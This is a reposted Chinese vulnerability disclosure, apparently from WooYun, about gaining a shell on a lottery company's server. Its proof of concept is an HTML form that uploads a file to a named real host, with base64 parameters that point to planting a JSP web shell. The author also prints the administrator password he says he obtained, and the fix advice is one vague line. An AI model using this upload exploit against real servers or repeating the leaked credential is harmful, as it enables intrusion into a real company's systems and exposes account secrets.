神刀安全网

漏洞标题: 某彩票公司getshell

漏洞详情

披露状态:

2016-04-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我走啊走到做彩票系统的公司住脚观看

详细说明:

直接上POC

code 区域
<body>

<form action="http://www.genlot.com:3000/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000" method="post" enctype ="multipart/form-data">



<input name="name" type="file" />



<input type="submit" name="Submit" value="Go"/>

只能这样了

漏洞标题:  某彩票公司getshell

我只是拿到了administrator的pass“ 9ol.;[= ”,彩票公司不搞内网渗透

漏洞证明:

漏洞标题:  某彩票公司getshell

修复方案:

客户端认证、算法加强或在server处理

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 某彩票公司getshell

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址